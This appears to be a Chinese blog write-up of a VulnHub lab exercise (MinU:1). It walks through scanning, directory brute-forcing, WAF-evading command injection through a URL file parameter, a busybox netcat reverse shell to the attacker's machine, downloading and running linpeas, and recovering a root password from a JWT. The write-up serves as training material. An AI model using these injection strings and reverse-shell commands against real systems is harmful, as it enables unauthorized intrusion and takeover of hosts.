【MinU:1渗透笔记】

最新推荐文章于 2024-05-10 09:57:35 发布
最新推荐文章于 2024-05-10 09:57:35 发布
阅读量418 收藏 2
点赞数 1
分类专栏: 渗透学习 文章标签: web安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Keey9/article/details/129528824
版权

1.前言

本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端、服务器或者实验环境,均为自行搭建的公开靶场。这里使用的技术仅用于学习交流目的,不做任何导向,请勿在现实环境中模仿,操作。本文涉及到的工具,仅就用到的方面做简要描述,如果想了解更详细的信息,请自行参阅其他技术资料。如果列出的技术用于其他任何目标,作者概不负责。

2.准备工作

镜像下载地址:https://download.vulnhub.com/minu/MinUv1.ova.7z

难度:简单/中等

镜像下载完成后使用VirtualBox导入,网络选择桥接模式,开启靶机,目标是获取root目录下的flag。

获得靶机IP:192.168.1.112

本机kali IP:192.168.1.113

准备工作完成,可以开始试验了。

3.网络扫描

nmap  -A  192.168.1.112

查看目标主机是否在线,开放了哪些端口,提供了哪些服务及版本,可以知道目标主机可能使用了哪些软件及版本,根据不同的软件查找漏洞或突破点。

发现开放了25、80、110端口,25端口为SMTP服务,110端口为POP3,80端口嗅探出了Ubuntu系统,HTTP服务,使用的是Apache软件,版本为2.4.27。

通过浏览器访问目标机器80端口。

看到是apache的初始服务页面,80端口开放了HTTP服务,没有发现其他有用的信息

4.目录爆破

4.1dirb 目录爆破

靶机存在web网站,猜测服务端是一定有目录的,可以试一下目录爆破,这里使用dirb,也可以使用其他目录爆破工具。dirb是一个基于字典的web目录扫描工具,查找现有的(和/或隐藏的)Web对象,通过对Web服务器发起基于字典的攻击并分析响应的数据。采用递归的方式来获取更多的目录,它还支持代理和http认证限制访问的网站,是在信息收集阶段获取目标信息常用工具手段。

dirb 192.168.1.112

扫描结果的状态码中大部分都是403,如果大批量出现403,说明前端是存在安全防护机制的,要么是waf要么是防御脚本。上面的爆破只有一个index.html返回的是200,访问发现就是刚才的主页。加大爆破力度。在很多情况下,我们需要在目标服务器上提取特定扩展名的目录,然后可以使用dirb扫描的-X参数。此参数接受文件扩展名,然后在目标服务器或计算机上搜索给定的扩展名文件。

通过Wappalyzer工具可以查看Web网站使用了哪些技术。可以看到网站使用了PHP语言,同时也可以看到Apache HTTP Server 版本、系统,与我们在nmap中嗅探的一样。我们可以加上扩展名php。此外,我们知道很多网站用PHP,可以单独扫一扫PHP文件。

dirb http://192.168.1.112/ -X .php

发现存在http://192.168.1.112/test.php(CODE:200|SIZE:1986)

4.2 dirsearch 目录爆破

直接使用dirsearch 目录扫描工具,可以直接扫描出结果,还可以使用御剑。

dirsearch  -u  192.168.1.112

 

访问 http://192.168.1.112/test.php。显示如下图

从页面中看到Read last visitor data,读取上次访问者数据,是个超链接。这里可能存在数据泄露,我们点击它看看。点击超链接后页面跳转如下。

在页面的地址栏中发现test.php?file=last.html。通常?file= 可能存在文件包含漏洞、sql注入漏洞、远程代码执行漏洞。

重新构造URL测试,http://192.168.1.112/test.php?file=../../../../../../etc/

报403错误,联系到前面目录爆破时候大量报403错误,猜测网络服务器处于网络应用防火墙(WAF ,Web Application Firewall)的保护状态,尝试绕过。

5.WAF绕过

5.1wafw00f

使用wafw00f进行waf探测,wafw00f是一个Web应用防火墙(WAF)指纹识别的工具。

wafwoof工作原理:

1、首先通过发送一个正常http请求,然后观察其返回有没有一些特征字符.

2、如果不成功,它将发送大量(潜在的恶意) HTTP 请求,并使用简单的逻辑推断出它是哪个WAF.

3、如果这也不成功,它将分析以前返回的响应,并使用另一个简单的算法来猜测WAF或安全解决方案是否正在积极响应我们的攻击.

wafw00f  http://192.168.1.112

显示存在WAF,但是没有识别出具体是什么WAF。网上资料显示,老版本的wafw00f可以探测出是ModSecurity (OWASP CRS),笔者没有降低自己机器wafwoof版本验证,知道了具体WAF类型之后可以网上检索绕过方法,这里知道有WAF之后,直接使用Fuzz模糊测试。

5.2 Fuzz模糊测试

wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/All_attack.txt http://192.168.1.112/test.php?file=FUZZ

wfuzz参数-c输出颜色,-z payload

这里探测出来很多结果,200反馈的都可以手工试一试,看是否能绕过,注意有的绕过方式自身可以绕过,但是接不同的命令就不能绕过了,或者只能执行部分命令,如果命令后面需要跟参数就更不行了,这不是我们需要的绕过方式。

例如,| 绕过,使用http://192.168..1.112/test.php?file=| dir 可以绕过

但是URL最后的命令换成ls就不能绕过,http://192.168.1.112/test.php?file=| ls

 5.3 二进制绕过WAF

有一些精心选择的Unix二进制文件,可用于绕过配置错误的系统中的本地安全限制。有一个提供包含二进制文件列表的网站:GTFOBins。里面的的busybox可以绕过waf。

根据二进制绕过WAF,反弹shell到攻击机上。

在攻击机上用nc监听6789端口,然后在浏览器上执行反弹shell。

启动nc监听:nc  -vlp  6789

反弹shell:http://192.168.1.112/test.php?file=YL;busybox nc 192.168.1.113 6789 -e sh

 反弹连接成功,但是显示的时候没有环境变量,每个二进制文件都包含环境变量,可以添加参数-i。

http://192.168.1.112/test.php?file=YL;busybox nc 192.168.1.113 6789 -e sh -i

6.提权

以上步骤已经获得了目标系统的用户权限,但是不是管理员权限,我们期望获得管理员的权限,获得管理员的账号/密码,完全控制目标机器,执行任意操作。

6.1 内部信息收集

使用命令 uname  -a

我们得知了操作系统版本信息,是32位系统。

我们可以使用Linux提取辅助工具,linpeas.sh脚本。脚本位于:PEASS-ng/linPEAS at master · carlospolop/PEASS-ng · GitHub

使用命令curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh >  linpeas.sh

下载到本地,然后上传到目标机器上并执行。

在攻击机器上启动HTTP服务,用于靶机从攻击机下载文件。

python -m http.server 80           #pyhton3中启动方式

python -m SimpleHTTPServer 8081    #python2启动方式

 使用wget命令从攻击机上传linpeas.sh到靶机。

wget http://192.168.1.113:8081/linpeas.sh -O /tmp/linpeas.sh

使用chmod,授予linpeas.sh执行权限并运行它。

chmod 777 linpeas.sh

 ./linpeas.sh

 这个脚本可以枚举很多有用的信息,比如一些CVE,隐藏文件,密码文件等等。

6.2 JWT解密

在目标系统中/home/bob目录下发现隐藏文件._pw_。显示看一下,怀疑是某种base64密文。

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.pn55j1CFpcLjvReaqyJr0BPEMYUsBdoDxEPo6Ft9cwg

 把密文放到burp中作为base64解码看看。

 发现是JWT(JSON Web 令牌)。找个JWT解密工具破解。

 解密出来密码是mlnV1

在反弹的shell中输入su root ,切换用户,没有反应。

原因是获取的shell不是一个标准的虚拟终端环境,会在一个功能非常有限的 shell 中,它仅仅是一个标准输入。我们会发现存在一个问题,就是即使我们获取了目标虚拟终端控制权限,但其回显信息与可交互性非常的差和不稳定,具体见情况有以下几个种。•获取的虚拟终端没有交互性,例如没有命令历史记录(并使用向上和向下箭头循环浏览它们)和文件名称、命令自动完成等,在缺少这些功能的 shell 中查询或操作会比较麻烦。我们想给添加的账号设置密码或执行sudo等命令,无法完成。•标准的错误输出无法显示,无法正常使用vim等文本编辑器等。•获取的目标主机的虚拟终端使用非常不稳定,很容易断开连接。这往往都是因为我们获取的shell并不是标准的虚拟终端,为了能够完成切换用户、输入密码等操作,我们必须模拟一个真正的终端设备。

在反弹的shell连接中输入

SHELL=/bin/bash script -q /dev/null

su root

然后输入密码mlnV1,在/root目录下即可看到flag.txt

7. 结语

通过这个实验,学习了nmap扫描、dirb目录爆破、WAF绕过、反弹shell、文件上传、JWT解密等等。渗透还是需要多动手实操作,重要的是清晰的思路,在每个步骤都有很多解决方案,用好Google。最后希望各位师傅多多指点!!!

北辰911
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
提权工具推荐(PEASS-ng、linpeas_linux_amd64、winPEASany_ofs)
墨痕诉清风的博客
03-21 1339
在这里,您可以找到适用于Windows、Linux/Unix*和MacOS的权限提升工具。这些工具搜索您可以利用的可能的本地权限提升路径,并用漂亮的颜色打印给您,这样您就可以很容易地识别错误配置。查看book.hacktricks.xyz中的本地Windows权限提升检查表WinPEAS-Windows本地权限提升真棒脚本(C#.exe和.bat)查看book.hacktricks.xyz中的本地Linux权限提升检查表LinPEAS-Linux本地权限提升真棒脚本(.sh)
PEASS-ng:PEASS - 权限提升真棒脚本套件(带颜色)
07-23
PEASS-ng - 新一代特权升级真棒脚本套件 在这里,您将找到适用于 Windows 和 Linux/Unix* 以及 MacOS 的权限提升工具。 这些工具会搜索您可以利用的可能的本地权限提升路径,并以漂亮的颜色将它们打印给您,以便您轻松识别错误配置。 查看的本地 Windows 权限提升清单 - Windows 本地提权真棒脚本(C#.exe 和 .bat) 查看的本地 Linux 权限提升清单 - Linux 本地提权真棒脚本 (.sh) 让我们一起改进PEASS 如果你想添加一些东西并有与这个项目相关的任何很酷的想法,请在电报组告诉我,或者阅读文件。 请,如果此工具对您有用,请考虑捐赠 豌豆风格 你是 PEASS 的粉丝吗? 立即在PEASS Shop 购买我们的商品,表达您对我们最喜欢的豌豆的热爱 咨询 PEAS 套件的所有脚本/二进制文件应仅用于授权渗透
全平台系统提权辅助工具 PEASS-ng
LuckySec
04-27 6325
0x01 PEASS-ng 介绍 PEAS-ng 是一款适用于 Windows 和 Linux/Unix* 和 MacOS 的权限提升工具。 项目地址:https://github.com/carlospolop/PEASS-ng PEAS-ng 工具搜索可能的本地权限提升路径,可以利用这些路径并将它们以漂亮的颜色打印输出,可以方便轻松识别错误配置。 检查来自book.hacktricks.xyz的本地 Windows 权限提升清单 WinPEAS - Windows 本地权限提权脚本(C#.exe
推荐PEASS-ng:新一代权限提升神器
最新发布
gitblog_00081的博客
05-10 356
推荐PEASS-ng:新一代权限提升神器 项目地址:https://gitcode.com/carlospolop/PEASS-ng网络安全领域,权限提升是渗透测试中至关重要的一步,它能帮助安全专家发现潜在的安全漏洞。今天,我们要向您推荐的是一款名为PEASS-ng的强大开源工具集,专为Windows、Linux和MacOS平台设计的本地权限提升神器。 项目介绍 PEASS-ng是一个精心编排...
【甄选靶场】Vulnhub百个项目渗透——项目二十四:MINU-1(WAF绕过,JWT爆破)
人间体佐菲的博客
09-26 1008
Vulnhub百个项目渗透——项目二十四:MINU-1(WAF绕过,JWT爆破)信息安全网络安全渗透测试
Minu:Projeto Minu在Node.js和ReactJS中的开发
02-12
最好的主菜/主菜/主菜/主菜/小菜/小食,将其出售给真正的顾客。 可以方便地在餐厅,快餐店,餐饮店和餐厅等场所用餐的人,可以简化流程。 :rocket: 技术 :information: 仪器Pré-requisitospara rodaraplicação:...
leetcode安卓-minu27:minu27
06-30
leetcode安卓嗨,我是敏儿 我是来自印度的 Minal Vaity,目前住在芝加哥。 我是在伊利诺伊理工学院攻读信息技术与管理硕士学位的二年级研究生。 :high_voltage: 技术 和我谈谈 ...使用Java进行后端开发 ...
minu_react:React.js研究
02-10
React.js레파지레파리 리액트스소스들 선언형 리많은이많은UI를생기생다줄여준다。 。리케이션의된된된다。 액트는터이변경됨에가렌더링한렌더링한렌더링한다。 。가능하고기디버그하다준다。...
minu-page:Notion Notion Web 模板,Minu 页面
07-24
Notion Notion Web 模板,Minu 页面| | | |介绍Minu Page 是一个受启发的网页模板。 Notion 的文档创建和共享功能非常强大,但是它有一个很大的缺点,就是笨重,自由度低。 因此,在轻便和增加自由度的同时让我们...
投资组合:请参阅Minu投资组合
02-28
文件夹 这是我的作品集! 这里的所有内容都会随着时间的推移而更新! 到目前为止,我真的希望您喜欢它!
unix-privesc-check - unix配置不当检查工具.mht
12-13
unix-privesc-check - unix配置不当检查工具.mht
记一次内网横向免杀测试
渗透测试研究中心
02-15 3133
工具准备jexbossKali LinuxCS 4.3Windows杀软在线查询一Windows杀软在线查询二Windows杀软在线查询三fscan潮汐shellcode免杀LSTARCobaltStrike其他插件PEASS-ngPrintSpoofer外网打点1、为了练习内网横向,悄悄的盯上国外的站点2、发现jboss网站存在反序列化漏洞,是呀jexboss无法利用成功python jexb...
【VulnHub】【2023年07月18日】最新全部靶场详情(中)
惟忆
07-18 8771
【VulnHub】【2023年07月18日】最新全部靶场详情(中)
vulnhub之devguru靶场提权过程(vulnhub打靶日记)
guanjian_ci的博客
04-02 1098
考点:1、拿下站点、敏感文件后,需要细心的审计搜索有价值的信息,特别是账号密码。2、常见网站october、gieat的历史漏洞,利用已知漏洞反弹shell,拿下网站。3、熟悉数据库后台创建用户,添加用户组,编辑用户的操作。4、了解linux提权常用操作,内核漏洞>suid/sudo>环境变量/计划任务等等。难点:1、常见网站october、gieat的历史漏洞,这些站点的漏洞能否成功利用提权,对于小白来说是块硬骨头。2、获取mysql的frank用户时,此处用的是修改加密方式、修改密码。
Hackthebox靶场---Undetected 攻略实战(难)
weixin_51339377的博客
04-24 4242
正常思路 nmap进行端口扫描 发现开放了80和22端口 网站进入80端口 是一个珠宝网站 发现点击store会重定向到其他的url http://store.djewelry.htb/ 我们首先用dirsearch扫描一下 然而并没有发现什么有用的,也跟基本主界面测试差不多 除了store可能有可以利用的地方 我们不妨把这个未知url的地址也dns解析到这个ip地址 执行以下命令即可 echo 10.10.11.146 djewelry.htb store.dj...
Vulnhub靶机检测不到IP地址(解决方案超细)
技术超强的网络安全平台
12-09 2926
因为靶机我们是不知道账号密码的。所以只能通过拯救模式进行操作,熟悉运维操作的应该清楚,当我们忘记Linux/Ubuntu密码时可以通过拯救模式进行修改密码等操作。接下来我就以Ubuntu系统为例 1.1在开机时按下Shift键进入以下界面 1.2在此页面按下e键,进入如下界面 1.3将ro 替换为 rw signie init=/bin/bash 1.4按下Ctrl键+X键,进入如下页面 1.5查看当前网卡IP信息 ip a 1.6编辑网卡配置文件vim /etc/network/interfac
渗透靶场——Vulnhub:MinUv1
tlovejr的博客
04-12 2016
前言 今天正常看到了一个Vulnhub系列靶场,这个靶场主要是含有waf防火墙这个知识点,现在给大家简单的说一下 1、主机存活探测 arp-scan -l 发现存活主机ip地址为192.168.1.7 2、端口扫描 nmap -A -p- -T4 192.168.1.7 在这里就发现开放了80端口,也显示了Apache的版本为2.4.27,其他并没有什么有用的信息 3、web渗透 直接访问80端口 http://192.168.1.7/ 发现直接是apache的一个初始的服务页面,也没有什么有
<script> setInterval(function() { var ctime = document.getElementsByClassName("c_time")[0] var tim = new Date() var year = tim.getFullYear() var month = tim.getMonth() + 1 monthlength = month.toString().length monthlength == 1 ? month = "0" + month : month var dat = tim.getDate() var datlength = dat.toString().length datlength == 1 ? dat = "0" + dat : dat var hours = tim.getHours() var hourslength = hours.toString().length hourslength == 1 ? hours = "0" + hours : hours var minu = tim.getMinutes() var minulength = minu.toString().length minulength == 1 ? minu = "0" + minu : minu var seco = tim.getSeconds() var secolength = seco.toString().length secolength == 1 ? seco = "0" + seco : seco = seco ctime.innerHTML = month + "/" + dat + "/" + year + " " + hours + ":" + minu + ":" + seco }, 1000) </script>
05-28
它使用了 `setInterval` 函数,每隔 1 秒执行一次匿名函数。函数内部使用 `Date` 对象获取当前时间,并将年、月、日、时、分、秒各个部分提取出来,然后进行格式化。最后将格式化后的时间字符串设置到具有 `c_time` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值